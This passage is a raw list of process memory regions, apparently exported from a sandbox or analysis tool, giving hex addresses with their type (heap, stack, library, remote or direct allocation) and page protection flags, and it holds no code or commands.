page read and write
50AE44C000
stack
page read and write
1656D996000
heap
page read and write
7FF848C34000
trusted library allocation
page read and write
1D639B60000
trusted library allocation
page read and write
1D63A5FD000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page read and write
7FF848D06000
trusted library allocation
page execute and read and write
1F1E6D32000
trusted library allocation
page read and write
210DA430000
heap
page read and write
ADB000
stack
page read and write
197C311A000
heap
page read and write
21AF45B6000
heap
page read and write
136F38E7000
heap
page read and write
7FF848E70000
trusted library allocation
page read and write
1F1E68A1000
trusted library allocation
page read and write
18243730000
trusted library allocation
page read and write
293A000
stack
page read and write
197C313D000
heap
page read and write
316C84E000
stack
page read and write
16510074000
trusted library allocation
page read and write
1D628170000
heap
page execute and read and write
1656BA3F000
heap
page read and write
210C0242000
heap
page read and write
50ACFFE000
stack
page read and write
1D629B51000
trusted library allocation
page read and write
197BAC5A000
trusted library allocation
page read and write
21A808D4000
trusted library allocation
page read and write
21AF47A4000
heap
page read and write
178E000
stack
page read and write
7FF848E80000
trusted library allocation
page read and write
1DF25757000
heap
page read and write
332B000
heap
page read and write
7FF848E80000
trusted library allocation
page read and write
313E000
stack
page read and write
7FF849090000
trusted library allocation
page read and write
7FF848F84000
trusted library allocation
page read and write
136F18F0000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
914B57E000
stack
page read and write
59C000
stack
page read and write
1ED3DBB000
stack
page read and write
7FF848E70000
trusted library allocation
page read and write
1DF254D3000
heap
page read and write
18255751000
trusted library allocation
page read and write
18243546000
heap
page read and write
1A5487E000
stack
page read and write
7FF848F50000
trusted library allocation
page read and write
18243710000
trusted library section
page read and write
332D000
heap
page read and write
7FF848D50000
trusted library allocation
page execute and read and write
136F1A11000
heap
page read and write
1A5574E000
stack
page read and write
3EAE000
stack
page read and write
7FF848F89000
trusted library allocation
page read and write
7E0000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
914BBBB000
stack
page read and write
7FF848E30000
trusted library allocation
page execute and read and write
1DF25558000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
3326000
heap
page read and write
7FF848DE2000
trusted library allocation
page read and write
1DF257F1000
heap
page read and write
31B0000
heap
page read and write
2BBF000
stack
page read and write
283B000
stack
page read and write
316B473000
stack
page read and write
8FA353B000
stack
page read and write
197AA9DE000
trusted library allocation
page read and write
1F1F68A1000
trusted library allocation
page read and write
3B54000
heap
page read and write
7FF848CEC000
trusted library allocation
page execute and read and write
7FF848DE1000
trusted library allocation
page read and write
210C1D40000
heap
page read and write
136F3A90000
heap
page execute and read and write
197A8BCF000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
7A55E7E000
stack
page read and write
23445A50000
heap
page read and write
1DF23730000
heap
page read and write
18243720000
trusted library section
page read and write
197AA5D0000
trusted library allocation
page read and write
18243754000
heap
page read and write
7FF848E90000
trusted library allocation
page read and write
1DF25547000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
1824723C000
trusted library allocation
page read and write
7FF848C33000
trusted library allocation
page execute and read and write
7FF848C6D000
trusted library allocation
page execute and read and write
3337000
heap
page read and write
136F3937000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF849023000
trusted library allocation
page read and write
210C0340000
heap
page readonly
7FF848FB0000
trusted library allocation
page read and write
32BF000
stack
page read and write
7FF848C23000
trusted library allocation
page execute and read and write
316BBFE000
stack
page read and write
16500903000
trusted library allocation
page read and write
136F3AF6000
heap
page read and write
1F1E62B5000
heap
page read and write
AA0000
heap
page read and write
1D628160000
trusted library allocation
page read and write
13690001000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page execute and read and write
9B0000
heap
page read and write
7FF849050000
trusted library allocation
page execute and read and write
1D6281B0000
trusted library allocation
page read and write
1824676E000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
1DF25701000
heap
page read and write
1D62B7A9000
trusted library allocation
page read and write
197AB9C2000
trusted library allocation
page read and write
1ED3D3E000
stack
page read and write
7A5587E000
stack
page read and write
197C305B000
heap
page read and write
7FF848E20000
trusted library allocation
page execute and read and write
165004A7000
trusted library allocation
page read and write
8FA2AC3000
stack
page read and write
3150000
heap
page read and write
1D629F57000
trusted library allocation
page read and write
1D641F41000
heap
page read and write
316BA7F000
stack
page read and write
1F1E4933000
heap
page read and write
197BA961000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
197AC1F0000
trusted library allocation
page read and write
1DF25717000
heap
page read and write
7FF848FD0000
trusted library allocation
page read and write
7A558FE000
stack
page read and write
21AF2494000
heap
page read and write
6EC000
stack
page read and write
21A8007C000
trusted library allocation
page read and write
AC59CFB000
stack
page read and write
32F2000
heap
page read and write
32D8000
heap
page read and write
1DF25721000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
8FA30F9000
stack
page read and write
1F1E6FB6000
trusted library allocation
page read and write
113A000
stack
page read and write
1D6281B2000
trusted library allocation
page read and write
7A55D7F000
stack
page read and write
3B4A000
heap
page read and write
197C2D30000
heap
page read and write
B1DB93E000
stack
page read and write
1F1FE986000
heap
page read and write
1656D4E5000
heap
page read and write
210DA1D0000
heap
page read and write
1656D470000
heap
page readonly
7FF848C44000
trusted library allocation
page read and write
297D000
stack
page read and write
103C000
stack
page read and write
7FF8490A0000
trusted library allocation
page read and write
182434E0000
heap
page read and write
3307000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
1F1E4951000
heap
page read and write
B1DB6B9000
stack
page read and write
1D62A10F000
trusted library allocation
page read and write
1DF256F6000
heap
page read and write
1650027E000
trusted library allocation
page read and write
3316000
heap
page read and write
1D628030000
heap
page read and write
210C0350000
trusted library allocation
page read and write
197C315B000
heap
page read and write
7FF848F95000
trusted library allocation
page read and write
7A55EFB000
stack
page read and write
3D4C000
stack
page read and write
21A90080000
trusted library allocation
page read and write
18243500000
heap
page read and write
1DF23830000
heap
page read and write
13680C9C000
trusted library allocation
page read and write
7FF848F70000
trusted library allocation
page read and write
A1C000
stack
page read and write
21A80518000
trusted library allocation
page read and write
13680A80000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
1D627F90000
heap
page read and write
1DF25521000
heap
page read and write
353CFFF000
stack
page read and write
7FF848C50000
trusted library allocation
page read and write
1825576B000
trusted library allocation
page read and write
C8A000
heap
page read and write
1DF2375A000
heap
page read and write
770000
heap
page read and write
474000
remote allocation
page execute and read and write
32E1000
heap
page read and write
21AF25C3000
heap
page read and write
8FA2B4F000
stack
page read and write
210DA2CE000
heap
page read and write
1656D91E000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page execute and read and write
2DF0000
heap
page read and write
1825D7C0000
heap
page read and write
B1DC38E000
stack
page read and write
197A8BDD000
heap
page read and write
210C024A000
heap
page read and write
B60000
heap
page read and write
21A80280000
trusted library allocation
page read and write
5D0000
heap
page read and write
B1DAF73000
stack
page read and write
7FF848DEA000
trusted library allocation
page read and write
1DF25946000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
10001000
direct allocation
page execute and read and write
C00000
heap
page read and write
1D628140000
trusted library allocation
page read and write
331F000
heap
page read and write
1DF25557000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
21A90074000
trusted library allocation
page read and write
1D62B629000
trusted library allocation
page read and write
B48000
heap
page read and write
26FC000
stack
page read and write
7FF848DEA000
trusted library allocation
page read and write
7FF848DD2000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
1DF237F7000
heap
page read and write
1DF25558000
heap
page read and write
136F1B75000
heap
page read and write
13690010000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
21AF3F80000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
1DF255C5000
heap
page read and write
1F1E6430000
heap
page read and write
1F1F6940000
trusted library allocation
page read and write
1A548FD000
stack
page read and write
1DF25946000
heap
page read and write
7FF848F9C000
trusted library allocation
page read and write
7FF848CD0000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
13680CC7000
trusted library allocation
page read and write
1656BB60000
heap
page read and write
13680B8E000
trusted library allocation
page read and write
16510029000
trusted library allocation
page read and write
21AF2490000
heap
page read and write
13680C5F000
trusted library allocation
page read and write
1DF25753000
heap
page read and write
1656D430000
trusted library allocation
page read and write
3313000
heap
page read and write
210C3991000
trusted library allocation
page read and write
41B000
system
page execute and read and write
1656DDD8000
heap
page read and write
1D629A2E000
heap
page read and write
23445B70000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page read and write
136F3900000
heap
page read and write
1DF25558000
heap
page read and write
136F1A90000
heap
page read and write
13680B78000
trusted library allocation
page read and write
7A5698D000
stack
page read and write
1A54ABE000
stack
page read and write
3696000
heap
page read and write
182450B0000
heap
page read and write
13680CA9000
trusted library allocation
page read and write
2CF0000
heap
page read and write
7FF848C8C000
trusted library allocation
page execute and read and write
136F3903000
heap
page read and write
7FF848DE0000
trusted library allocation
page read and write
1F1E493F000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
18245682000
trusted library allocation
page read and write
32E1000
heap
page read and write
8FA2EFD000
stack
page read and write
7FF849060000
trusted library allocation
page execute and read and write
21A804B6000
trusted library allocation
page read and write
21A804DE000
trusted library allocation
page read and write
50AE4CC000
stack
page read and write
7DF4DF430000
trusted library allocation
page execute and read and write
1D629B40000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
1825DB0F000
heap
page read and write
210C023D000
heap
page read and write
11A0000
heap
page read and write
331F000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
50AD6FC000
stack
page read and write
C0A000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
197BA9D4000
trusted library allocation
page read and write
1825575B000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
7FF848CE0000
trusted library allocation
page read and write
1D639FB4000
trusted library allocation
page read and write
18244F10000
heap
page readonly
197A8B90000
heap
page read and write
197AA5B0000
trusted library allocation
page read and write
1D6421F2000
heap
page read and write
13680421000
trusted library allocation
page read and write
1D62AB94000
trusted library allocation
page read and write
1D629F5B000
trusted library allocation
page read and write
1F1E47B0000
heap
page read and write
1A54CBE000
stack
page read and write
13680AC0000
trusted library allocation
page read and write
E0F000
stack
page read and write
136F1AC0000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
13680C6E000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
13680BF0000
trusted library allocation
page read and write
330C000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
7FF849077000
trusted library allocation
page read and write
3311000
heap
page read and write
7FF848E70000
trusted library allocation
page read and write
914B5FB000
stack
page read and write
7FF848F50000
trusted library allocation
page read and write
26C0000
heap
page read and write
13680CAE000
trusted library allocation
page read and write
13680CC2000
trusted library allocation
page read and write
7FF848CEC000
trusted library allocation
page execute and read and write
1F1E6FD8000
trusted library allocation
page read and write
197AA790000
heap
page read and write
210C1F83000
trusted library allocation
page read and write
136F1AD0000
heap
page readonly
1F1FEC38000
heap
page read and write
50AD8FE000
stack
page read and write
210C01D0000
heap
page read and write
10016000
direct allocation
page execute and read and write
7FF848CF0000
trusted library allocation
page read and write
13680098000
trusted library allocation
page read and write
13680C3B000
trusted library allocation
page read and write
1D62B2FB000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
136F19E3000
heap
page read and write
45D000
system
page execute and read and write
45C000
system
page execute and read and write
914C64D000
stack
page read and write
7FF848EB0000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
13680B56000
trusted library allocation
page read and write
3AFB000
heap
page read and write
21AF4050000
heap
page read and write
197C3000000
heap
page read and write
1DF254D0000
heap
page read and write
197AA8D0000
heap
page read and write
136F1981000
heap
page read and write
18247281000
trusted library allocation
page read and write
21AF482E000
heap
page read and write
1D641F54000
heap
page read and write
13680038000
trusted library allocation
page read and write
7A55C79000
stack
page read and write
210C1D20000
heap
page execute and read and write
1D629F41000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
7FF848D16000
trusted library allocation
page execute and read and write
1D642087000
heap
page execute and read and write
7FF848E00000
trusted library allocation
page execute and read and write
197A8C8C000
heap
page read and write
182434C0000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
1656B960000
heap
page read and write
34BF000
stack
page read and write
1824651E000
trusted library allocation
page read and write
1D639D7E000
trusted library allocation
page read and write
1F1F68B1000
trusted library allocation
page read and write
1F1E62F0000
trusted library allocation
page read and write
400000
system
page execute and read and write
7DF446970000
trusted library allocation
page execute and read and write
1A54D3B000
stack
page read and write
1651009F000
trusted library allocation
page read and write
21A80497000
trusted library allocation
page read and write
136F334B000
heap
page read and write
7FF848E80000
trusted library allocation
page read and write
332D000
heap
page read and write
7FF848E02000
trusted library allocation
page read and write
1D62A16B000
trusted library allocation
page read and write
D80000
heap
page read and write
1656BA87000
heap
page read and write
1824355E000
heap
page read and write
7FF848C4D000
trusted library allocation
page execute and read and write
7FF848DDA000
trusted library allocation
page read and write
27FF000
stack
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
2A7F000
stack
page read and write
1D62B5E7000
trusted library allocation
page read and write
210DA2A1000
heap
page read and write
1D629F5F000
trusted library allocation
page read and write
AC596FF000
stack
page read and write
13680AE8000
trusted library allocation
page read and write
A86000
heap
page read and write
210C0090000
heap
page read and write
136F1AA0000
trusted library allocation
page read and write
7FF848F32000
trusted library allocation
page read and write
1DF25A8C000
heap
page read and write
136F399F000
heap
page read and write
1D628085000
heap
page read and write
31BE000
stack
page read and write
50AD27E000
stack
page read and write
7FF848D16000
trusted library allocation
page execute and read and write
136F38CF000
heap
page read and write
1ED367E000
stack
page read and write
2700000
heap
page read and write
18246463000
trusted library allocation
page read and write
7FF848C33000
trusted library allocation
page execute and read and write
7FF848CE0000
trusted library allocation
page read and write
1F1E7160000
trusted library allocation
page read and write
21AF4530000
heap
page read and write
1D628103000
heap
page read and write
197A8C1B000
heap
page read and write
331A000
heap
page read and write
13680AB4000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
A20000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
3330000
heap
page read and write
210C0170000
heap
page read and write
210C03E0000
trusted library allocation
page read and write
3690000
heap
page read and write
1DF23620000
heap
page read and write
210D1D51000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
3960000
heap
page read and write
1D629BD0000
trusted library allocation
page read and write
3318000
heap
page read and write
B1DB47E000
stack
page read and write
1656DC70000
heap
page execute and read and write
1DF25581000
heap
page read and write
13680C45000
trusted library allocation
page read and write
136F1950000
heap
page read and write
1D62A0A2000
trusted library allocation
page read and write
8F9000
stack
page read and write
197AA580000
heap
page read and write
3324000
heap
page read and write
7FF848E12000
trusted library allocation
page read and write
1D628270000
heap
page read and write
210DA223000
heap
page read and write
914B1EF000
stack
page read and write
136F1970000
heap
page read and write
7FF848F10000
trusted library allocation
page read and write
1D641E90000
heap
page read and write
1D6423B0000
trusted library section
page read and write
16500496000
trusted library allocation
page read and write
1D6421F8000
heap
page read and write
3331000
heap
page read and write
B1DB9BB000
stack
page read and write
7FF848E20000
trusted library allocation
page execute and read and write
8FA34BE000
stack
page read and write
1D639B51000
trusted library allocation
page read and write
1D62B254000
trusted library allocation
page read and write
21AF25C6000
heap
page read and write
150F000
stack
page read and write
7FF848E60000
trusted library allocation
page read and write
36AF000
stack
page read and write
136806C1000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
7FF848DD1000
trusted library allocation
page read and write
316BC7B000
stack
page read and write
7A55CFC000
stack
page read and write
210D1D60000
trusted library allocation
page read and write
1F1E4B3E000
heap
page read and write
1D62B2C5000
trusted library allocation
page read and write
21AF45CD000
heap
page read and write
13680C24000
trusted library allocation
page read and write
1F1FE8A1000
heap
page read and write
13680CB2000
trusted library allocation
page read and write
13680CC9000
trusted library allocation
page read and write
13680CFC000
trusted library allocation
page read and write
7FF848C70000
trusted library allocation
page read and write
136804B7000
trusted library allocation
page read and write
18246827000
trusted library allocation
page read and write
1D628180000
trusted library allocation
page read and write
2706000
heap
page read and write
197C315E000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
1DF255BA000
heap
page read and write
7FF848D10000
trusted library allocation
page read and write
197AA664000
heap
page read and write
1656D97B000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
7A559FB000
stack
page read and write
A7E000
stack
page read and write
7A5577F000
stack
page read and write
7FF848D50000
trusted library allocation
page execute and read and write
7FF848F50000
trusted library allocation
page read and write
7FF848E12000
trusted library allocation
page read and write
197AA820000
heap
page read and write
23445830000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
1F1E6ACE000
trusted library allocation
page read and write
136800AD000
trusted library allocation
page read and write
AC598FD000
stack
page read and write
1825574D000
trusted library allocation
page read and write
7FF848F80000
trusted library allocation
page read and write
1F1E4790000
heap
page read and write
1F1FEC41000
heap
page read and write
8FA31B7000
stack
page read and write
1656D400000
heap
page read and write
7FF848E00000
trusted library allocation
page execute and read and write
210DA1C0000
heap
page execute and read and write
7FF848EC0000
trusted library allocation
page read and write
210C3383000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page read and write
21AF4790000
heap
page read and write
1DF259F0000
heap
page read and write
1DF23A05000
heap
page read and write
18243548000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
1F1E48D0000
heap
page read and write
13680CF5000
trusted library allocation
page read and write
1ED33AE000
stack
page read and write
32FE000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
3314000
heap
page read and write
AEF000
stack
page read and write
13680C0C000
trusted library allocation
page read and write
197AC763000
trusted library allocation
page read and write
7A556FF000
stack
page read and write
210C1BF7000
heap
page read and write
3311000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
1F1FEBEA000
heap
page read and write
1DF25A8C000
heap
page read and write
1DF25721000
heap
page read and write
1825DA10000
heap
page read and write
197AA850000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
50ACF33000
stack
page read and write
3302000
heap
page read and write
316B57F000
stack
page read and write
1824592E000
trusted library allocation
page read and write
50AD579000
stack
page read and write
1D628010000
trusted library allocation
page read and write
1DF23A00000
heap
page read and write
21AF24A0000
heap
page read and write
1DF23700000
heap
page read and write
21AF2430000
heap
page read and write
537E000
stack
page read and write
330D000
heap
page read and write
1D62808B000
heap
page read and write
13680C08000
trusted library allocation
page read and write
210DA444000
heap
page read and write
210C0200000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page read and write
16500716000
trusted library allocation
page read and write
32F2000
heap
page read and write
18255491000
trusted library allocation
page read and write
136F19CB000
heap
page read and write
210DA26F000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
182466B2000
trusted library allocation
page read and write
136F3977000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
7FF848E02000
trusted library allocation
page read and write
1824648F000
trusted library allocation
page read and write
330B000
heap
page read and write
32F0000
heap
page read and write
7FF848E50000
trusted library allocation
page read and write
13680587000
trusted library allocation
page read and write
1D639BC3000
trusted library allocation
page read and write
7FF848CF6000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page read and write
18245450000
heap
page execute and read and write
13680A57000
trusted library allocation
page read and write
21A804A9000
trusted library allocation
page read and write
21AF4540000
heap
page read and write
32F2000
heap
page read and write
1A5457F000
stack
page read and write
21AF24F0000
heap
page read and write
1DF259F9000
heap
page read and write
1D62B2EB000
trusted library allocation
page read and write
D3F000
stack
page read and write
1368002F000
trusted library allocation
page read and write
8FA313E000
stack
page read and write
1DF256F0000
heap
page read and write
1DF2375F000
heap
page read and write
7FF848D16000
trusted library allocation
page execute and read and write
7FF848C34000
trusted library allocation
page read and write
7FF848E15000
trusted library allocation
page read and write
16510221000
trusted library allocation
page read and write
1D62A141000
trusted library allocation
page read and write
1D62A165000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page execute and read and write
1D641EDE000
heap
page read and write
1D628035000
heap
page read and write
1ED36FE000
stack
page read and write
197AA7C7000
heap
page execute and read and write
21A80001000
trusted library allocation
page read and write
7FF848C30000
trusted library allocation
page read and write
7FF848C8C000
trusted library allocation
page execute and read and write
316B5FE000
stack
page read and write
1F1FEC0F000
heap
page read and write
13680001000
trusted library allocation
page read and write
1D629D73000
trusted library allocation
page read and write
1DF254E3000
heap
page read and write
F3486FF000
unkown
page read and write
197C30AC000
heap
page read and write
353CEFF000
unkown
page read and write
914B67E000
stack
page read and write
471000
remote allocation
page execute and read and write
4DA0000
heap
page read and write
13680C91000
trusted library allocation
page read and write
18245210000
heap
page execute and read and write
7FF848C23000
trusted library allocation
page execute and read and write
1F1E68E6000
trusted library allocation
page read and write
50AD476000
stack
page read and write
1F1E4888000
heap
page read and write
136F3AE0000
heap
page read and write
210C0310000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
13680CF7000
trusted library allocation
page read and write
7A5597E000
stack
page read and write
1D629F4C000
trusted library allocation
page read and write
1DF25704000
heap
page read and write
7FF848EF0000
trusted library allocation
page read and write
1656DD80000
heap
page read and write
32D5000
heap
page read and write
7FF848E70000
trusted library allocation
page read and write
1F1E63A0000
heap
page read and write
1F1E6D7F000
trusted library allocation
page read and write
70C000
stack
page read and write
7FF848F98000
trusted library allocation
page read and write
1D628150000
heap
page readonly
9AE000
stack
page read and write
21AF4608000
heap
page read and write
1D62B2CF000
trusted library allocation
page read and write
B3E000
stack
page read and write
182461D9000
trusted library allocation
page read and write
16500524000
trusted library allocation
page read and write
13680C86000
trusted library allocation
page read and write
13680885000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
1F1FEB00000
heap
page read and write
7FF848C22000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page execute and read and write
914B7FA000
stack
page read and write
7FF848E60000
trusted library allocation
page read and write
7FF848E02000
trusted library allocation
page read and write
16500B06000
trusted library allocation
page read and write
18244F50000
trusted library allocation
page read and write
7FF848DD2000
trusted library allocation
page read and write
21AF2420000
heap
page read and write
11D8000
heap
page read and write
13680CCB000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page execute and read and write
1530000
heap
page read and write
353CB1D000
stack
page read and write
1825DB35000
heap
page read and write
1D6424D0000
heap
page read and write
13680CA3000
trusted library allocation
page read and write
3E6B000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
136F19AA000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
130E000
stack
page read and write
197AA7C0000
heap
page execute and read and write
3303000
heap
page read and write
3E4D000
stack
page read and write
18243585000
heap
page read and write
13680501000
trusted library allocation
page read and write
1DF25180000
heap
page read and write
7FF848C4B000
trusted library allocation
page read and write
1DF25710000
heap
page read and write
3308000
heap
page read and write
182450B4000
heap
page read and write
7FF848F70000
trusted library allocation
page read and write
A90000
heap
page read and write
7DF4DF440000
trusted library allocation
page execute and read and write
197C3010000
heap
page read and write
1F1E4919000
heap
page read and write
2720000
heap
page read and write
197A8BD5000
heap
page read and write
330E000
heap
page read and write
1D641ECA000
heap
page read and write
316B6FE000
stack
page read and write
7FF848F30000
trusted library allocation
page read and write
1DF25946000
heap
page read and write
B1DB37D000
stack
page read and write
7FF848DD1000
trusted library allocation
page read and write
21AF4612000
heap
page read and write
13680896000
trusted library allocation
page read and write
1DF25706000
heap
page read and write
1DF23825000
heap
page read and write
1D642030000
heap
page execute and read and write
5310000
heap
page read and write
197AA770000
trusted library allocation
page read and write
1F1FE9B0000
heap
page execute and read and write
1F1E71A3000
trusted library allocation
page read and write
F3487FF000
stack
page read and write
197ABA87000
trusted library allocation
page read and write
197A8B70000
heap
page read and write
197C301D000
heap
page read and write
136F39AE000
heap
page read and write
7FF848C40000
trusted library allocation
page read and write
197A8DB4000
heap
page read and write
18245216000
heap
page execute and read and write
16510281000
trusted library allocation
page read and write
7FF848F72000
trusted library allocation
page read and write
1DF255A1000
heap
page read and write
7FF848C40000
trusted library allocation
page read and write
316B7FD000
stack
page read and write
3140000
heap
page read and write
2344586A000
heap
page read and write
25BF000
stack
page read and write
F1E000
heap
page read and write
1368046F000
trusted library allocation
page read and write
56C000
stack
page read and write
1190000
heap
page read and write
136808AD000
trusted library allocation
page read and write
1DF2375B000
heap
page read and write
330E000
heap
page read and write
7FF848EB3000
trusted library allocation
page read and write
21A9009F000
trusted library allocation
page read and write
50AE54C000
stack
page read and write
1DF25700000
heap
page read and write
B1DB579000
stack
page read and write
197AC2B1000
trusted library allocation
page read and write
1656DD88000
heap
page read and write
7FF848C30000
trusted library allocation
page read and write
1DF25584000
heap
page read and write
210C398D000
trusted library allocation
page read and write
AC593FE000
stack
page read and write
7FF848DC2000
trusted library allocation
page read and write
1F1E6D57000
trusted library allocation
page read and write
21AF25C1000
heap
page read and write
136F38D9000
heap
page read and write
50AD4FD000
stack
page read and write
18247286000
trusted library allocation
page read and write
1D62A10B000
trusted library allocation
page read and write
13680B48000
trusted library allocation
page read and write
914BA3E000
stack
page read and write
1ED37FF000
stack
page read and write
1F1E6DCC000
trusted library allocation
page read and write
1F1F6AC1000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
7FF848D16000
trusted library allocation
page read and write
1656BA4D000
heap
page read and write
7FF848F98000
trusted library allocation
page read and write
BD0000
heap
page read and write
332D000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
13680CC5000
trusted library allocation
page read and write
1F1F6914000
trusted library allocation
page read and write
1824670B000
trusted library allocation
page read and write
13680B32000
trusted library allocation
page read and write
7FF848DD0000
trusted library allocation
page read and write
197AC788000
trusted library allocation
page read and write
210D1F07000
trusted library allocation
page read and write
4EAF000
stack
page read and write
1F1E6D49000
trusted library allocation
page read and write
21A90001000
trusted library allocation
page read and write
1A54C3E000
stack
page read and write
1650051C000
trusted library allocation
page read and write
3318000
heap
page read and write
316C6CD000
stack
page read and write
1FD82640000
heap
page read and write
1ED387E000
stack
page read and write
18245290000
heap
page read and write
B1DB73F000
stack
page read and write
7FF848F60000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page execute and read and write
316C7CD000
stack
page read and write
23445B75000
heap
page read and write
1656BA00000
heap
page read and write
197AA620000
trusted library allocation
page read and write
21AF3EF0000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page execute and read and write
7FF848C2D000
trusted library allocation
page execute and read and write
1F1E691F000
trusted library allocation
page read and write
1A54978000
stack
page read and write
7FF848FA0000
trusted library allocation
page read and write
7DF482DA0000
trusted library allocation
page execute and read and write
B1DB7B8000
stack
page read and write
1656D4E0000
heap
page read and write
1D62807E000
heap
page read and write
C20000
heap
page read and write
1D62B2D3000
trusted library allocation
page read and write
5470000
heap
page read and write
1D6421D8000
heap
page read and write
400000
system
page execute and read and write
13680BEA000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
1D62A0E2000
trusted library allocation
page read and write
2570000
heap
page read and write
1D6421A0000
heap
page read and write
1656BA75000
heap
page read and write
7A5690E000
stack
page read and write
197C3160000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
7FF848E12000
trusted library allocation
page read and write
7FF848C64000
trusted library allocation
page read and write
18244F00000
trusted library allocation
page read and write
136F19C3000
heap
page read and write
21AF455B000
heap
page read and write
1F1E62B0000
heap
page read and write
7FF848C50000
trusted library allocation
page read and write
914B6FE000
stack
page read and write
7FF848DE1000
trusted library allocation
page read and write
182451F0000
heap
page execute and read and write
210C3644000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
1D62B86F000
trusted library allocation
page read and write
7FF848D06000
trusted library allocation
page execute and read and write
1D641F00000
heap
page read and write
197AA8F0000
heap
page read and write
210D1DD0000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
21AF4585000
heap
page read and write
197A8DD4000
heap
page read and write
182554D4000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
7FF848CDC000
trusted library allocation
page execute and read and write
1D62B2A9000
trusted library allocation
page read and write
182467A2000
trusted library allocation
page read and write
1DF25757000
heap
page read and write
32E1000
heap
page read and write
7FF848DE0000
trusted library allocation
page execute and read and write
3318000
heap
page read and write
1A547FB000
stack
page read and write
1DF25757000
heap
page read and write
316B8F6000
stack
page read and write
1F1E4B35000
heap
page read and write
136F1A0B000
heap
page read and write
316B777000
stack
page read and write
C9E000
heap
page read and write
7FF848D55000
trusted library allocation
page execute and read and write
7FF848D16000
trusted library allocation
page execute and read and write
7FF848C30000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
13680A2F000
trusted library allocation
page read and write
7FF848C34000
trusted library allocation
page read and write
1DF25757000
heap
page read and write
1D6420B0000
heap
page read and write
1DF23737000
heap
page read and write
7FF848CEC000
trusted library allocation
page execute and read and write
3324000
heap
page read and write
13680D08000
trusted library allocation
page read and write
197A8BEF000
heap
page read and write
210C024C000
heap
page read and write
197AA912000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
7FF848C40000
trusted library allocation
page read and write
B1DB27E000
stack
page read and write
197AA91C000
heap
page read and write
197C3073000
heap
page read and write
473000
system
page execute and read and write
7A55AFD000
stack
page read and write
7FF848DF1000
trusted library allocation
page read and write
16500082000
trusted library allocation
page read and write
7FF848DE1000
trusted library allocation
page read and write
13690073000
trusted library allocation
page read and write
21A806E4000
trusted library allocation
page read and write
413C000
stack
page read and write
1825DB4E000
heap
page read and write
210C3734000
trusted library allocation
page read and write
3316000
heap
page read and write
136F199D000
heap
page read and write
914B164000
